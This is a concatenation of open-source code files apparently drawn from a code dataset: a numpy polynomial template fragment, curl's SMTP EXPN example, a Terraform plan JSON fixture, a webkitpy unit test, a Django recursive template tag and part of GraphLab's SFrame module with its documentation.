passing in a 2D-array that contains one dataset per column.
deg : int
Degree of the fitting polynomial
domain : {None, [beg, end], []}, optional
Domain to use for the returned $name instance. If ``None``,
then a minimal domain that covers the points `x` is chosen. If
``[]`` the default domain ``$domain`` is used. The default
value is $domain in numpy 1.4.x and ``None`` in later versions.
The ``'[]`` value was added in numpy 1.5.0.
rcond : float, optional
Relative condition number of the fit. Singular values smaller
than this relative to the largest singular value will be
ignored. The default value is len(x)*eps, where eps is the
relative precision of the float type, about 2e-16 in most
cases.
full : bool, optional
Switch determining nature of return value. When it is False
(the default) just the coefficients are returned, when True
diagnostic information from the singular value decomposition is
also returned.
w : array_like, shape (M,), optional
Weights. If not None the contribution of each point
``(x[i],y[i])`` to the fit is weighted by `w[i]`. Ideally the
weights are chosen so that the errors of the products
``w[i]*y[i]`` all have the same variance. The default value is
None.
.. versionadded:: 1.5.0
Returns
-------
least_squares_fit : instance of $name
The $name instance is the least squares fit to the data and
has the domain specified in the call.
[residuals, rank, singular_values, rcond] : only if `full` = True
Residuals of the least-squares fit, the effective rank of the
scaled Vandermonde matrix and its singular values, and the
specified value of `rcond`. For more details, see
`linalg.lstsq`.
See Also
--------
${nick}fit : similar function
"""
if domain is None :
domain = pu.getdomain(x)
elif domain == [] :
domain = $domain
xnew = pu.mapdomain(x, domain, $domain)
res = ${nick}fit(xnew, y, deg, w=w, rcond=rcond, full=full)
if full :
[coef, status] = res
return $name(coef, domain=domain), status
else :
coef = res
return $name(coef, domain=domain)
@staticmethod
def fromroots(roots, domain=$domain) :
"""Return $name object with specified roots.
See ${nick}fromroots for full documentation.
See Also
--------
${nick}fromroots : equivalent function
"""
if domain is None :
domain = pu.getdomain(roots)
rnew = pu.mapdomain(roots, domain, $domain)
coef = ${nick}fromroots(rnew)
return $name(coef, domain=domain)
@staticmethod
def identity(domain=$domain) :
"""Identity function.
If ``p`` is the returned $name object, then ``p(x) == x`` for all
values of x.
Parameters:
-----------
domain : array_like
The resulting array must be if the form ``[beg, end]``, where
``beg`` and ``end`` are the endpoints of the domain.
Returns:
--------
identity : $name object
"""
off, scl = pu.mapparms($domain, domain)
coef = ${nick}line(off, scl)
return $name(coef, domain)
'''.replace('REL_IMPORT', rel_import)) | unknown | codeparrot/codeparrot-clean | ||
/***************************************************************************
* _ _ ____ _
* Project ___| | | | _ \| |
* / __| | | | |_) | |
* | (__| |_| | _ <| |___
* \___|\___/|_| \_\_____|
*
* Copyright (C) Daniel Stenberg, <daniel@haxx.se>, et al.
*
* This software is licensed as described in the file COPYING, which
* you should have received as part of this distribution. The terms
* are also available at https://curl.se/docs/copyright.html.
*
* You may opt to use, copy, modify, merge, publish, distribute and/or sell
* copies of the Software, and permit persons to whom the Software is
* furnished to do so, under the terms of the COPYING file.
*
* This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
* KIND, either express or implied.
*
* SPDX-License-Identifier: curl
*
***************************************************************************/
/* <DESC>
* Expand an SMTP email mailing list
* </DESC>
*/
#include <stdio.h>
#include <string.h>
#include <curl/curl.h>
/* This is a simple example showing how to expand an email mailing list.
*
* Notes:
*
* 1) This example requires libcurl 7.34.0 or above.
* 2) Not all email servers support this command.
*/
int main(void)
{
CURL *curl;
CURLcode result = curl_global_init(CURL_GLOBAL_ALL);
if(result != CURLE_OK)
return (int)result;
curl = curl_easy_init();
if(curl) {
struct curl_slist *recipients = NULL;
/* This is the URL for your mailserver */
curl_easy_setopt(curl, CURLOPT_URL, "smtp://mail.example.com");
/* Note that the CURLOPT_MAIL_RCPT takes a list, not a char array */
recipients = curl_slist_append(recipients, "Friends");
curl_easy_setopt(curl, CURLOPT_MAIL_RCPT, recipients);
/* Set the EXPN command */
curl_easy_setopt(curl, CURLOPT_CUSTOMREQUEST, "EXPN");
/* Perform the custom request */
result = curl_easy_perform(curl);
/* Check for errors */
if(result != CURLE_OK)
fprintf(stderr, "curl_easy_perform() failed: %s\n",
curl_easy_strerror(result));
/* Free the list of recipients */
curl_slist_free_all(recipients);
/* curl does not send the QUIT command until you call cleanup, so you
* should be able to reuse this connection for additional requests. It may
* not be a good idea to keep the connection open for a long time though
* (more than a few minutes may result in the server timing out the
* connection) and you do want to clean up in the end.
*/
curl_easy_cleanup(curl);
}
curl_global_cleanup();
return 0;
} | c | github | https://github.com/curl/curl | docs/examples/smtp-expn.c |
{
"applyable": true,
"complete": true,
"configuration": {
"provider_config": {
"null": {
"full_name": "registry.terraform.io/hashicorp/null",
"name": "null",
"version_constraint": "3.1.1"
}
},
"root_module": {}
},
"errored": false,
"format_version": "1.2",
"planned_values": {
"root_module": {}
},
"prior_state": {
"format_version": "1.0",
"values": {
"root_module": {
"resources": [
{
"address": "null_resource.null_resource",
"mode": "managed",
"name": "null_resource",
"provider_name": "registry.terraform.io/hashicorp/null",
"schema_version": 0,
"sensitive_values": {},
"type": "null_resource",
"values": {
"id": "7115293105928418144",
"triggers": null
}
}
]
}
}
},
"resource_changes": [
{
"action_reason": "delete_because_no_resource_config",
"address": "null_resource.null_resource",
"change": {
"actions": [
"delete"
],
"after": null,
"after_sensitive": false,
"after_unknown": {},
"before": {
"id": "7115293105928418144",
"triggers": null
},
"before_sensitive": {}
},
"mode": "managed",
"name": "null_resource",
"provider_name": "registry.terraform.io/hashicorp/null",
"type": "null_resource"
}
]
} | json | github | https://github.com/hashicorp/terraform | testing/equivalence-tests/outputs/null_provider_delete/plan.json |
# Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import webkitpy.thirdparty.unittest2 as unittest
from webkitpy.common.system.filesystem import FileSystem
import find_files
class MockWinFileSystem(object):
def join(self, *paths):
return '\\'.join(paths)
def normpath(self, path):
return path.replace('/', '\\')
class TestWinNormalize(unittest.TestCase):
def assert_filesystem_normalizes(self, filesystem):
self.assertEqual(find_files._normalize(filesystem, "c:\\foo",
['fast/html', 'fast/canvas/*', 'compositing/foo.html']),
['c:\\foo\\fast\html', 'c:\\foo\\fast\canvas\*', 'c:\\foo\compositing\\foo.html'])
def test_mocked_win(self):
# This tests test_files.normalize, using portable behavior emulating
# what we think Windows is supposed to do. This test will run on all
# platforms.
self.assert_filesystem_normalizes(MockWinFileSystem())
def test_win(self):
# This tests the actual windows platform, to ensure we get the same
# results that we get in test_mocked_win().
if sys.platform != 'win32':
return
self.assert_filesystem_normalizes(FileSystem()) | unknown | codeparrot/codeparrot-clean | ||
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from google.appengine.dist import use_library
use_library('django', '1.2')
from django.template import Library
from django.template import Node, NodeList
from django.template import TemplateSyntaxError, VariableDoesNotExist
register = Library()
class RecurseNode( Node ):
def __init__(self, **kwargs):
self.loopvar, self.sequence = kwargs['loopvar'], kwargs['sequence']
self.children_name = kwargs['children_name']
self.nodelist_first, self.nodelist_second = kwargs['nodelist_first'], kwargs['nodelist_second']
del kwargs['nodelist_first'], kwargs['nodelist_second'], kwargs['sequence'], kwargs['children_name'], kwargs['loopvar']
self.kwargs = kwargs
def __repr__(self):
reversed_text = self.is_reversed and ' reversed' or ''
return "<For Node: for %s in %s, tail_len: %d%s>" % \
(', '.join(self.loopvars), self.sequence, len(self.nodelist_loop),
reversed_text)
def __iter__(self):
for node in self.nodelist_first:
yield node
for node in self.nodelist_second:
yield node
def get_nodes_by_type(self, nodetype):
nodes = []
if isinstance(self, nodetype):
nodes.append(self)
nodes.extend( self.nodelist_first.get_nodes_by_type(nodetype) )
nodes.extend( self.nodelist_second.get_nodes_by_type(nodetype) )
return nodes
def render(self, context, depth=0, values=False):
nodelist = NodeList()
if 'recurseloop' in context:
parentloop = context['recurseloop']
else:
parentloop = {}
context.push()
# On the first recursion pass, we have no values
if not values:
try:
values = self.sequence.resolve(context, True)
except VariableDoesNotExist:
values = []
if values is None:
values = []
if not hasattr(values, '__len__'):
values = list(values)
len_values = len(values)
# Create a recurseloop value in the context. We'll update counters on each iteration just below.
loop_dict = context['recurseloop'] = {'parent': parentloop}
loop_dict['depth'] = depth + 1
loop_dict['depth0'] = depth
for i, item in enumerate(values):
# Add the additional arguments to the context
# They come in the form of {'name':(initial,increment)}
# As for now only numbers are supported, but also strings can be multiplied
for k,v in self.kwargs.iteritems():
context[k] = v[0] + v[1]*depth
# Shortcuts for current loop iteration number.
loop_dict['counter0'] = i
loop_dict['counter'] = i+1
# Boolean values designating first and last times through loop.
loop_dict['first'] = (i == 0)
loop_dict['last'] = (i == len_values - 1)
context[ self.loopvar ] = item
for node in self.nodelist_first:
nodelist.append( node.render(context) )
if len( getattr( item, self.children_name ) ):
nodelist.append( self.render( context, depth+1, getattr( item, self.children_name ) ) )
for node in self.nodelist_second:
nodelist.append( node.render(context) )
context.pop()
return nodelist.render(context)
#@register.tag(name="for")
def do_recurse(parser, token):
"""
Recursively loops over each item in an array .
It also increments passed variables on each recursion depth.
For example, to display a list of comments with replies given ``comment_list``:
{% recurse comment in comments children="replies" indent=(0,20) %}
<div style="margin-left:{{indent}}px">{{ comment.text }}</div>
{% endrecurse %}
``children`` is the name of the iterable that contains the children of the current element
``children`` needs to be a property of comment, and is required for the recurseloop to work
You can pass additional parameters after children in the form of:
var_name=(intial_value, increment)
You need to take care of creating the tree structure on your own.
As for now there should be no spaces between the equal ``=``
signs when assigning children or additional variables
In addition to the variables passed, the recurse loop sets a
number of variables available within the loop:
========================== ================================================
Variable Description
========================== ================================================
``recurseloop.depth`` The current depth of the loop (1 is the top level)
``recurseloop.depth0`` The current depth of the loop (0 is the top level)
``recurseloop.counter`` The current iteration of the current level(1-indexed)
``recurseloop.counter0`` The current iteration of the current level(0-indexed)
``recurseloop.first`` True if this is the first time through the current level
``recurseloop.last`` True if this is the last time through the current level
``recurseloop.parent`` This is the loop one level "above" the current one
========================== ================================================
You can also use the tag {% yield %} inside a recursion.
The ``yield`` tag will output the same HTML that's between the recurse and endrecurse tags
if the current element has children. If there are no children ``yield`` will output nothing
You must not, however wrap the ``yield`` tag inside other tags, just like you must not wrap
the ``else`` tag inside other tags when making if-else-endif
"""
# We will be throwing this a lot
def tError( contents ):
raise TemplateSyntaxError(
"'recurse' statements should use the format"
"'{%% recurse x in y children=\"iterable_property_name\" "
"arg1=(float,float) arg2=(\"str\",\"str\") %%}: %s" % contents )
bits = token.contents.split()
quotes = ["'","\""]
lenbits = len(bits)
if lenbits < 5:
tError(token.contents)
in_index = 2
children_index = 4
if bits[in_index] != 'in':
tError(token.contents)
children_token = bits[children_index].split("=")
if len(children_token) != 2 or children_token[0] != 'children':
tError(token.contents)
f = children_token[1][0]
l = children_token[1][-1]
if f != l or f not in quotes:
tError(token.contents)
else:
children_token[1] = children_token[1].replace(f,"")
def convert(val):
try:
val = float(val)
except ValueError:
f = val[0]
l = val[-1]
if f != l or f not in quotes:
tError(token.contents)
val = unicode( val.replace(f,"") )
return val
node_vars = {}
if lenbits > 5:
for bit in bits[5:]:
arg = bit.split("=")
if len(arg) != 2 :
tError(token.contents)
f = arg[1][0]
l = arg[1][-1]
if f != "(" or l != ")":
tError(token.contents)
try:
argval = tuple([ convert(x) for x in arg[1].replace("(","").replace(")","").split(",") ])
# Invalid float number, or missing comma
except (IndexError, ValueError):
tError(token.contents)
node_vars[ str(arg[0]) ] = argval
node_vars['children_name'] = children_token[1]
node_vars['loopvar'] = bits[1]
node_vars['sequence'] = parser.compile_filter(bits[3])
nodelist_first = parser.parse( ('yield', 'endrecurse',) )
token = parser.next_token()
if token.contents == 'yield':
nodelist_second = parser.parse( ('endrecurse', ) )
parser.delete_first_token()
else:
nodelist_second = NodeList()
node_vars['nodelist_first'] = nodelist_first
node_vars['nodelist_second'] = nodelist_second
return RecurseNode(**node_vars)
do_recurse = register.tag("recurse", do_recurse) | unknown | codeparrot/codeparrot-clean | ||
"""
This module defines the SFrame class which provides the
ability to create, access and manipulate a remote scalable dataframe object.
SFrame acts similarly to pandas.DataFrame, but the data is completely immutable
and is stored column wise on the GraphLab Server side.
"""
'''
Copyright (C) 2015 Dato, Inc.
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the DATO-PYTHON-LICENSE file for details.
'''
import graphlab.connect as _mt
import graphlab.connect.main as glconnect
from graphlab.cython.cy_type_utils import infer_type_of_list
from graphlab.cython.context import debug_trace as cython_context
from graphlab.cython.cy_sframe import UnitySFrameProxy
from graphlab.util import _check_canvas_enabled, _make_internal_url, _is_callable
from graphlab.data_structures.sarray import SArray, _create_sequential_sarray
import graphlab.aggregate
import graphlab
import array
from prettytable import PrettyTable
from textwrap import wrap
import datetime
import inspect
from graphlab.deps import pandas, HAS_PANDAS
import time
import itertools
import os
import subprocess
import uuid
import platform
__all__ = ['SFrame']
SFRAME_GARBAGE_COLLECTOR = []
FOOTER_STRS = ['Note: Only the head of the SFrame is printed.',
'You can use print_rows(num_rows=m, num_columns=n) to print more rows and columns.']
LAZY_FOOTER_STRS = ['Note: Only the head of the SFrame is printed. This SFrame is lazily evaluated.',
'You can use len(sf) to force materialization.']
SFRAME_ROOTS = [# Binary/lib location in production egg
os.path.abspath(os.path.join(os.path.dirname(
os.path.realpath(__file__)), '..')),
# Build tree location of SFrame binaries
os.path.abspath(os.path.join(os.path.dirname(
os.path.realpath(__file__)),
'..', '..', '..', '..', 'sframe')),
# Location of python sources
os.path.abspath(os.path.join(os.path.dirname(
os.path.realpath(__file__)),
'..', '..', '..', '..', 'unity', 'python', 'graphlab')),
# Build tree dependency location
os.path.abspath(os.path.join(os.path.dirname(
os.path.realpath(__file__)),
'..', '..', '..', '..', '..', '..', 'deps', 'local', 'lib'))
]
RDD_SFRAME_PICKLE = "rddtosf_pickle"
RDD_SFRAME_NONPICKLE = "rddtosf_nonpickle"
SFRAME_RDD_PICKLE = "sftordd_pickle"
HDFS_LIB = "libhdfs.so"
RDD_JAR_FILE = "graphlab-create-spark-integration.jar"
SYS_UTIL_PY = "sys_util.py"
RDD_SUPPORT_INITED = False
BINARY_PATHS = {}
STAGING_DIR = None
RDD_SUPPORT = True
PRODUCTION_RUN = False
YARN_OS = None
SPARK_SUPPORT_NAMES = {'RDD_SFRAME_PATH':'rddtosf_pickle',
'RDD_SFRAME_NONPICKLE_PATH':'rddtosf_nonpickle',
'SFRAME_RDD_PATH':'sftordd_pickle',
'HDFS_LIB_PATH':'libhdfs.so',
'RDD_JAR_PATH':'graphlab-create-spark-integration.jar',
'SYS_UTIL_PY_PATH':'sys_util.py',
'SPARK_PIPE_WRAPPER_PATH':'spark_pipe_wrapper'}
first = True
for i in SFRAME_ROOTS:
for key,val in SPARK_SUPPORT_NAMES.iteritems():
tmp_path = os.path.join(i, val)
if key not in BINARY_PATHS and os.path.isfile(tmp_path):
BINARY_PATHS[key] = tmp_path
if all(name in BINARY_PATHS for name in SPARK_SUPPORT_NAMES.keys()):
if first:
PRODUCTION_RUN = True
break
first = False
if not all(name in BINARY_PATHS for name in SPARK_SUPPORT_NAMES.keys()):
RDD_SUPPORT = False
def get_spark_integration_jar_path():
"""
The absolute path of the jar file required to enable GraphLab Create's
integration with Apache Spark.
"""
if 'RDD_JAR_PATH' not in BINARY_PATHS:
raise RuntimeError("Could not find a spark integration jar. "\
"Does your version of GraphLab Create support Spark Integration (is it >= 1.0)?")
return BINARY_PATHS['RDD_JAR_PATH']
def __rdd_support_init__(sprk_ctx):
global YARN_OS
global RDD_SUPPORT_INITED
global STAGING_DIR
global BINARY_PATHS
if not RDD_SUPPORT or RDD_SUPPORT_INITED:
return
# Make sure our GraphLabUtil scala functions are accessible from the driver
try:
tmp = sprk_ctx._jvm.org.graphlab.create.GraphLabUtil.EscapeString(sprk_ctx._jvm.java.lang.String("1,2,3,4"))
except:
raise RuntimeError("Could not execute RDD translation functions. "\
"Please make sure you have started Spark "\
"(either with spark-submit or pyspark) with the following flag set:\n"\
"'--driver-class-path " + BINARY_PATHS['RDD_JAR_PATH']+"'\n"\
"OR set the property spark.driver.extraClassPath in spark-defaults.conf")
dummy_rdd = sprk_ctx.parallelize([1])
if PRODUCTION_RUN and sprk_ctx.master == 'yarn-client':
# Get cluster operating system
os_rdd = dummy_rdd.map(lambda x: platform.system())
YARN_OS = os_rdd.collect()[0]
# Set binary path
for i in BINARY_PATHS.keys():
s = BINARY_PATHS[i]
if os.path.basename(s) == SPARK_SUPPORT_NAMES['SYS_UTIL_PY_PATH']:
continue
if YARN_OS == 'Linux':
BINARY_PATHS[i] = os.path.join(os.path.dirname(s), 'linux', os.path.basename(s))
elif YARN_OS == 'Darwin':
BINARY_PATHS[i] = os.path.join(os.path.dirname(s), 'osx', os.path.basename(s))
else:
raise RuntimeError("YARN cluster has unsupported operating system "\
"(something other than Linux or Mac OS X). "\
"Cannot convert RDDs on this cluster to SFrame.")
# Create staging directory
staging_dir = '.graphlabStaging'
if sprk_ctx.master == 'yarn-client':
tmp_loc = None
# Get that staging directory's full name
tmp_loc = dummy_rdd.map(
lambda x: subprocess.check_output(
["hdfs", "getconf", "-confKey", "fs.defaultFS"]).rstrip()).collect()[0]
STAGING_DIR = os.path.join(tmp_loc, "user", sprk_ctx.sparkUser(), staging_dir)
if STAGING_DIR is None:
raise RuntimeError("Failed to create a staging directory on HDFS. "\
"Do your cluster nodes have a working hdfs client?")
# Actually create the staging dir
unity = glconnect.get_unity()
unity.__mkdir__(STAGING_DIR)
unity.__chmod__(STAGING_DIR, 0777)
elif sprk_ctx.master[0:5] == 'local':
# Save the output sframes to the same temp workspace this engine is
# using
#TODO: Consider cases where server and client aren't on the same machine
unity = glconnect.get_unity()
STAGING_DIR = unity.get_current_cache_file_location()
if STAGING_DIR is None:
raise RuntimeError("Could not retrieve local staging directory! \
Please contact us on http://forum.dato.com.")
else:
raise RuntimeError("Your spark context's master is '" +
str(sprk_ctx.master) +
"'. Only 'local' and 'yarn-client' are supported.")
if sprk_ctx.master == 'yarn-client':
sprk_ctx.addFile(BINARY_PATHS['RDD_SFRAME_PATH'])
sprk_ctx.addFile(BINARY_PATHS['HDFS_LIB_PATH'])
sprk_ctx.addFile(BINARY_PATHS['SFRAME_RDD_PATH'])
sprk_ctx.addFile(BINARY_PATHS['RDD_SFRAME_NONPICKLE_PATH'])
sprk_ctx.addFile(BINARY_PATHS['SYS_UTIL_PY_PATH'])
sprk_ctx.addFile(BINARY_PATHS['SPARK_PIPE_WRAPPER_PATH'])
sprk_ctx._jsc.addJar(BINARY_PATHS['RDD_JAR_PATH'])
RDD_SUPPORT_INITED = True
def load_sframe(filename):
"""
Load an SFrame. The filename extension is used to determine the format
automatically. This function is particularly useful for SFrames previously
saved in binary format. For CSV imports the ``SFrame.read_csv`` function
provides greater control. If the SFrame is in binary format, ``filename`` is
actually a directory, created when the SFrame is saved.
Parameters
----------
filename : string
Location of the file to load. Can be a local path or a remote URL.
Returns
-------
out : SFrame
See Also
--------
SFrame.save, SFrame.read_csv
Examples
--------
>>> sf = graphlab.SFrame({'id':[1,2,3], 'val':['A','B','C']})
>>> sf.save('my_sframe') # 'my_sframe' is a directory
>>> sf_loaded = graphlab.load_sframe('my_sframe')
"""
sf = SFrame(data=filename)
return sf
class SFrame(object):
"""
A tabular, column-mutable dataframe object that can scale to big data. The
data in SFrame is stored column-wise on the GraphLab Server side, and is
stored on persistent storage (e.g. disk) to avoid being constrained by
memory size. Each column in an SFrame is a size-immutable
:class:`~graphlab.SArray`, but SFrames are mutable in that columns can be
added and subtracted with ease. An SFrame essentially acts as an ordered
dict of SArrays.
Currently, we support constructing an SFrame from the following data
formats:
* csv file (comma separated value)
* sframe directory archive (A directory where an sframe was saved
previously)
* general text file (with csv parsing options, See :py:meth:`read_csv()`)
* a Python dictionary
* pandas.DataFrame
* JSON
* Apache Avro
* PySpark RDD
and from the following sources:
* your local file system
* the GraphLab Server's file system
* HDFS
* Amazon S3
* HTTP(S).
Only basic examples of construction are covered here. For more information
and examples, please see the `User Guide <https://dato.com/learn/user
guide/index.html#Working_with_data_Tabular_data>`_, `API Translator
<https://dato.com/learn/translator>`_, `How-Tos
<https://dato.com/learn/how-to>`_, and data science `Gallery
<https://dato.com/learn/gallery>`_.
Parameters
----------
data : array | pandas.DataFrame | string | dict, optional
The actual interpretation of this field is dependent on the ``format``
parameter. If ``data`` is an array or Pandas DataFrame, the contents are
stored in the SFrame. If ``data`` is a string, it is interpreted as a
file. Files can be read from local file system or urls (local://,
hdfs://, s3://, http://).
format : string, optional
Format of the data. The default, "auto" will automatically infer the
input data format. The inference rules are simple: If the data is an
array or a dataframe, it is associated with 'array' and 'dataframe'
respectively. If the data is a string, it is interpreted as a file, and
the file extension is used to infer the file format. The explicit
options are:
- "auto"
- "array"
- "dict"
- "sarray"
- "dataframe"
- "csv"
- "tsv"
- "sframe".
See Also
--------
read_csv:
Create a new SFrame from a csv file. Preferred for text and CSV formats,
because it has a lot more options for controlling the parser.
save : Save an SFrame for later use.
Notes
-----
- When working with the GraphLab EC2 instance (see
:py:func:`graphlab.aws.launch_EC2()`), an SFrame cannot be constructed
using local file path, because it involves a potentially large amount of
data transfer from client to server. However, it is still okay to use a
remote file path. See the examples below. A similar restriction applies to
:py:class:`graphlab.SGraph` and :py:class:`graphlab.SArray`.
- When reading from HDFS on Linux we must guess the location of your java
installation. By default, we will use the location pointed to by the
JAVA_HOME environment variable. If this is not set, we check many common
installation paths. You may use two environment variables to override
this behavior. GRAPHLAB_JAVA_HOME allows you to specify a specific java
installation and overrides JAVA_HOME. GRAPHLAB_LIBJVM_DIRECTORY
overrides all and expects the exact directory that your preferred
libjvm.so file is located. Use this ONLY if you'd like to use a
non-standard JVM.
Examples
--------
>>> import graphlab
>>> from graphlab import SFrame
**Construction**
Construct an SFrame from a dataframe and transfers the dataframe object
across the network.
>>> df = pandas.DataFrame()
>>> sf = SFrame(data=df)
Construct an SFrame from a local csv file (only works for local server).
>>> sf = SFrame(data='~/mydata/foo.csv')
Construct an SFrame from a csv file on Amazon S3. This requires the
environment variables: *AWS_ACCESS_KEY_ID* and *AWS_SECRET_ACCESS_KEY* to be
set before the python session started. Alternatively, you can use
:py:func:`graphlab.aws.set_credentials()` to set the credentials after
python is started and :py:func:`graphlab.aws.get_credentials()` to verify
these environment variables.
>>> sf = SFrame(data='s3://mybucket/foo.csv')
Read from HDFS using a specific java installation (environment variable
only applies when using Linux)
>>> import os
>>> os.environ['GRAPHLAB_JAVA_HOME'] = '/my/path/to/java'
>>> from graphlab import SFrame
>>> sf = SFrame("hdfs://mycluster.example.com:8020/user/myname/coolfile.txt")
An SFrame can be constructed from a dictionary of values or SArrays:
>>> sf = gl.SFrame({'id':[1,2,3],'val':['A','B','C']})
>>> sf
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
2 3 C
Or equivalently:
>>> ids = SArray([1,2,3])
>>> vals = SArray(['A','B','C'])
>>> sf = SFrame({'id':ids,'val':vals})
It can also be constructed from an array of SArrays in which case column
names are automatically assigned.
>>> ids = SArray([1,2,3])
>>> vals = SArray(['A','B','C'])
>>> sf = SFrame([ids, vals])
>>> sf
Columns:
X1 int
X2 str
Rows: 3
Data:
X1 X2
0 1 A
1 2 B
2 3 C
If the SFrame is constructed from a list of values, an SFrame of a single
column is constructed.
>>> sf = SFrame([1,2,3])
>>> sf
Columns:
X1 int
Rows: 3
Data:
X1
0 1
1 2
2 3
**Parsing**
The :py:func:`graphlab.SFrame.read_csv()` is quite powerful and, can be
used to import a variety of row-based formats.
First, some simple cases:
>>> !cat ratings.csv
user_id,movie_id,rating
10210,1,1
10213,2,5
10217,2,2
10102,1,3
10109,3,4
10117,5,2
10122,2,4
10114,1,5
10125,1,1
>>> gl.SFrame.read_csv('ratings.csv')
Columns:
user_id int
movie_id int
rating int
Rows: 9
Data:
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 10210 | 1 | 1 |
| 10213 | 2 | 5 |
| 10217 | 2 | 2 |
| 10102 | 1 | 3 |
| 10109 | 3 | 4 |
| 10117 | 5 | 2 |
| 10122 | 2 | 4 |
| 10114 | 1 | 5 |
| 10125 | 1 | 1 |
+---------+----------+--------+
[9 rows x 3 columns]
Delimiters can be specified, if "," is not the delimiter, for instance
space ' ' in this case. Only single character delimiters are supported.
>>> !cat ratings.csv
user_id movie_id rating
10210 1 1
10213 2 5
10217 2 2
10102 1 3
10109 3 4
10117 5 2
10122 2 4
10114 1 5
10125 1 1
>>> gl.SFrame.read_csv('ratings.csv', delimiter=' ')
By default, "NA" or a missing element are interpreted as missing values.
>>> !cat ratings2.csv
user,movie,rating
"tom",,1
harry,5,
jack,2,2
bill,,
>>> gl.SFrame.read_csv('ratings2.csv')
Columns:
user str
movie int
rating int
Rows: 4
Data:
+---------+-------+--------+
| user | movie | rating |
+---------+-------+--------+
| tom | None | 1 |
| harry | 5 | None |
| jack | 2 | 2 |
| missing | None | None |
+---------+-------+--------+
[4 rows x 3 columns]
Furthermore due to the dictionary types and list types, can handle parsing
of JSON-like formats.
>>> !cat ratings3.csv
business, categories, ratings
"Restaurant 1", [1 4 9 10], {"funny":5, "cool":2}
"Restaurant 2", [], {"happy":2, "sad":2}
"Restaurant 3", [2, 11, 12], {}
>>> gl.SFrame.read_csv('ratings3.csv')
Columns:
business str
categories array
ratings dict
Rows: 3
Data:
+--------------+--------------------------------+-------------------------+
| business | categories | ratings |
+--------------+--------------------------------+-------------------------+
| Restaurant 1 | array('d', [1.0, 4.0, 9.0, ... | {'funny': 5, 'cool': 2} |
| Restaurant 2 | array('d') | {'sad': 2, 'happy': 2} |
| Restaurant 3 | array('d', [2.0, 11.0, 12.0]) | {} |
+--------------+--------------------------------+-------------------------+
[3 rows x 3 columns]
The list and dictionary parsers are quite flexible and can absorb a
variety of purely formatted inputs. Also, note that the list and dictionary
types are recursive, allowing for arbitrary values to be contained.
All these are valid lists:
>>> !cat interesting_lists.csv
list
[]
[1,2,3]
[1;2,3]
[1 2 3]
[{a:b}]
["c",d, e]
[[a]]
>>> gl.SFrame.read_csv('interesting_lists.csv')
Columns:
list list
Rows: 7
Data:
+-----------------+
| list |
+-----------------+
| [] |
| [1, 2, 3] |
| [1, 2, 3] |
| [1, 2, 3] |
| [{'a': 'b'}] |
| ['c', 'd', 'e'] |
| [['a']] |
+-----------------+
[7 rows x 1 columns]
All these are valid dicts:
>>> !cat interesting_dicts.csv
dict
{"classic":1,"dict":1}
{space:1 seperated:1}
{emptyvalue:}
{}
{:}
{recursive1:[{a:b}]}
{:[{:[a]}]}
>>> gl.SFrame.read_csv('interesting_dicts.csv')
Columns:
dict dict
Rows: 7
Data:
+------------------------------+
| dict |
+------------------------------+
| {'dict': 1, 'classic': 1} |
| {'seperated': 1, 'space': 1} |
| {'emptyvalue': None} |
| {} |
| {None: None} |
| {'recursive1': [{'a': 'b'}]} |
| {None: [{None: array('d')}]} |
+------------------------------+
[7 rows x 1 columns]
**Saving**
Save and load the sframe in native format.
>>> sf.save('mysframedir')
>>> sf2 = graphlab.load_sframe('mysframedir')
**Column Manipulation **
An SFrame is composed of a collection of columns of SArrays, and individual
SArrays can be extracted easily. For instance given an SFrame:
>>> sf = SFrame({'id':[1,2,3],'val':['A','B','C']})
>>> sf
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
2 3 C
The "id" column can be extracted using:
>>> sf["id"]
dtype: int
Rows: 3
[1, 2, 3]
And can be deleted using:
>>> del sf["id"]
Multiple columns can be selected by passing a list of column names:
>>> sf = SFrame({'id':[1,2,3],'val':['A','B','C'],'val2':[5,6,7]})
>>> sf
Columns:
id int
val str
val2 int
Rows: 3
Data:
id val val2
0 1 A 5
1 2 B 6
2 3 C 7
>>> sf2 = sf[['id','val']]
>>> sf2
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
2 3 C
The same mechanism can be used to re-order columns:
>>> sf = SFrame({'id':[1,2,3],'val':['A','B','C']})
>>> sf
Columns:
id int
val str
Rows: 3
Data:
id val
0 1 A
1 2 B
2 3 C
>>> sf[['val','id']]
>>> sf
Columns:
val str
id int
Rows: 3
Data:
val id
0 A 1
1 B 2
2 C 3
**Element Access and Slicing**
SFrames can be accessed by integer keys just like a regular python list.
Such operations may not be fast on large datasets so looping over an SFrame
should be avoided.
>>> sf = SFrame({'id':[1,2,3],'val':['A','B','C']})
>>> sf[0]
{'id': 1, 'val': 'A'}
>>> sf[2]
